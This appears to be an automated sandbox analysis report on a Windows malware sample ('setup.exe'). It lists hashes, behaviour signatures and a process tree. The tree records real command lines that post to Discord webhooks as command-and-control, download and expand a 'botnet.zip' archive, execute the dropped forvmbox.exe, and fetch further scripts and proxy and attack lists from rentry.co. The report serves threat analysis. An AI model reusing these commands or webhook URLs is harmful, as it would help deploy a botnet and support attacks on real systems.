Analysis
-
max time kernel
1338s -
max time network
1163s -
platform
windows10-2004_x64 -
resource
win10v2004-20230703-en -
resource tags
arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system -
submitted
24-08-2023 16:55
Static task
static1
Behavioral task
behavioral1
Sample
setup.exe
Resource
win10v2004-20230703-en
General
-
Target
setup.exe
-
Size
90KB
-
MD5
c6e5a3cde0b24500707a24999a9d4d51
-
SHA1
2945e204907db886a3697ab688afb0c8f3586ae8
-
SHA256
2e7dec5db09f94639381215051c55c01535a90c309942e789a736e96e0b60f7b
-
SHA512
67cf148a2e577f849989087d70a6c7db18daf3c4458d7c00636c614b7cb71a667fa4a19d3d4b05141927e8696e73c39fe597b99ee232d46d2e9f369985937e9e
-
SSDEEP
1536:j7fbN3eEDhDPA/pICdUkbBtW7upvaLU0bI5taxKo0IOlnToIfhwSROa:/7DhdC6kzWypvaQ0FxyNTBfhnb
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
pid Process 3580 forvmbox.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2200 powershell.exe 2200 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2200 powershell.exe -
Suspicious use of WriteProcessMemory 23 IoCs
description pid Process procid_target PID 1712 wrote to memory of 3000 1712 setup.exe 82 PID 1712 wrote to memory of 3000 1712 setup.exe 82 PID 3000 wrote to memory of 684 3000 cmd.exe 83 PID 3000 wrote to memory of 684 3000 cmd.exe 83 PID 3000 wrote to memory of 4468 3000 cmd.exe 84 PID 3000 wrote to memory of 4468 3000 cmd.exe 84 PID 3000 wrote to memory of 2200 3000 cmd.exe 91 PID 3000 wrote to memory of 2200 3000 cmd.exe 91 PID 3000 wrote to memory of 3580 3000 cmd.exe 98 PID 3000 wrote to memory of 3580 3000 cmd.exe 98 PID 3000 wrote to memory of 3580 3000 cmd.exe 98 PID 3000 wrote to memory of 1708 3000 cmd.exe 101 PID 3000 wrote to memory of 1708 3000 cmd.exe 101 PID 3580 wrote to memory of 1980 3580 forvmbox.exe 100 PID 3580 wrote to memory of 1980 3580 forvmbox.exe 100 PID 1980 wrote to memory of 4912 1980 cmd.exe 102 PID 1980 wrote to memory of 4912 1980 cmd.exe 102 PID 3000 wrote to memory of 2160 3000 cmd.exe 103 PID 3000 wrote to memory of 2160 3000 cmd.exe 103 PID 3000 wrote to memory of 1800 3000 cmd.exe 104 PID 3000 wrote to memory of 1800 3000 cmd.exe 104 PID 1980 wrote to memory of 396 1980 cmd.exe 105 PID 1980 wrote to memory of 396 1980 cmd.exe 105
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1712 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\7CF0.tmp\7CF1.tmp\7CF2.bat C:\Users\Admin\AppData\Local\Temp\setup.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:3000 -
C:\Windows\system32\curl.execurl -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"Admin Connected to the API\"}" https://discord.com/api/webhooks/1143935323655634964/7Tdk2BNleWb0ZkJSiY1uuNDzNoj9ArVcuUoX6DPp_ZZitmO1VYj9jLFtdI83CxGCWsTC3⤵PID:684
-
-
C:\Windows\system32\curl.execurl -o botnet.zip https://cdn.discordapp.com/attachments/1141139274176155688/1143684627261820988/botney.zip3⤵PID:4468
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Expand-Archive -Path 'botnet.zip' -DestinationPath 'C:\Users\Admin\Desktop'"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2200
-
-
C:\Users\Admin\Desktop\forvmbox.exeforvmbox.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3580 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\E02E.tmp\E02F.tmp\E030.bat C:\Users\Admin\Desktop\forvmbox.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:1980 -
C:\Windows\system32\curl.execurl -s -o op.bat https://rentry.co/nfago/raw5⤵PID:4912
-
-
C:\Windows\system32\curl.execurl -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": null, \"embeds\": [{\"title\": \"Attack :=: 13:58:40.11 {}\", \"description\": \" Mon 07/03/2023-13:58:40.11 / \",\"color\": 1127128,\"author\": {\"name\": \"MLBOT BOTNET API LOG\",\"icon_url\": \"https://cdn.discordapp.com/attachments/353651119685107714/1078725179850637372/danger_death_head_internet_security_skull_virus_icon_127111.png\"}}],\"attachments\": []}" https://discord.com/api/webhooks/1140675610524532868/T1taUTk6bStR2J1f9uoXFj7PQAMLD1T1yXMewAm481PLreURT2PLhzfvxpkEb4JO9VJy5⤵PID:396
-
-
-
-
C:\Windows\system32\curl.execurl -s -o C:\Users\Admin\Desktop\attaks\methods\list.txt https://rentry.co/httpslist/raw3⤵PID:1708
-
-
C:\Windows\system32\curl.execurl -s -o C:\Users\Admin\Desktop\attaks\methods\tlsv\proxy.txt https://rentry.co/httpsproxy/raw3⤵PID:2160
-
-
C:\Windows\system32\curl.execurl -s -o C:\Users\Admin\Desktop\attaks\methods\http.txt https://rentry.co/httpsproxy/raw3⤵PID:1800
-
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:1148
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5762a94fd24e4f9f357b00419eea3ae82
SHA1b134ea18dcfc75283a8f154e3f0acaf55d515b20
SHA256960a1d40361818e6b888fdd3734cf0de1356a470dbb7528a218644ccf9e1f74d
SHA5126c05121d2c18ce7a12605597a12a7f6427a81741571d79f3b183d51635e28139a1b51a5dad8d6d54aa01ea5b943d8a91c94ae556899b3bb2684f072af09eeb32
-
Filesize
3KB
MD5d5f935d0b2ddc1212f762ebe21bcb2ae
SHA159a320dce6123484a146bcdeac43277b39ca03cb
SHA2567a68493dbb79471fc0fa27ab7f57380d199fff07c881588c72819426c5c740d7
SHA51214864ebedaa6c1a6773dc768d9d5d3ed7f102d2aaaa6f09f32f5ee9a75ab738a256ca686c7b3e2f3b65e632610bff6e8cc26da10732b2546863cb94ec84fb76d
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
35.9MB
MD570228b5cd219e39ddf20122c56b3866f
SHA1c3120ad1ca629d707a7220963ad2326c2b096f37
SHA256a5538de4385e4c1869e63cd3094e8d43efbae23377c153d9ef9ff772f169cfb5
SHA512bae73c538df3d574451963942048e639f8a1811e0498fd741dc23510dc0702ba5f6553381e81947e9da45059c8b2eda8db75e03dba54dea486c8c87c29a50654
-
Filesize
186B
MD5bfd3d0748ac3a838d224d452d6d5959f
SHA19506c3eba5b8fa602290a75597e2ef720767c5d6
SHA25684ec21b7d8415b974e444e6e230a68a934719a7da452eb0f21ff4ff716e13ba5
SHA512bef9d23bf2a0a5811c51684e933dba127f817a8dc4b7a0deedbc53af9beb64ab245dfa722b94f10defcbe311b448a6e593173639adb4069d076104ad6848a680
-
Filesize
102.2MB
MD55bb85a31212764a644641bae9c63335e
SHA1595e8e7df7c8a1fd1c1bbbb973c747810ee46a37
SHA25694cb34780ec0e193eff4dc120c09d4d2d4d87b0af48c853e4b6c7a9fd4deeb7e
SHA512ddecf2be9bbaab3a2f93a571877e36a98fec7bfb64516646053e272fa22000183da6f865d2dc7be2af92ee480131e05d23d34efa838ca1bd15a48269551b8002
-
Filesize
92KB
MD58c661213d9bbfb8a9a3d42c6b6cb7059
SHA19f795650dfbac6f49896026b047d16f3a0c16ec9
SHA2563a02fcf8821a21bafcdc5273eccce353036dd48ffd5c5f91a1d47e5a9fa243ce
SHA512d21b5b738857535c6eb181636ab78c08d872d33b5b18dff50ab694f6d1afe335db321767720a0a5ab056c3c03e98195dd4086f7eb8e21abf25ff3c0ac75bf0d4
-
Filesize
92KB
MD58c661213d9bbfb8a9a3d42c6b6cb7059
SHA19f795650dfbac6f49896026b047d16f3a0c16ec9
SHA2563a02fcf8821a21bafcdc5273eccce353036dd48ffd5c5f91a1d47e5a9fa243ce
SHA512d21b5b738857535c6eb181636ab78c08d872d33b5b18dff50ab694f6d1afe335db321767720a0a5ab056c3c03e98195dd4086f7eb8e21abf25ff3c0ac75bf0d4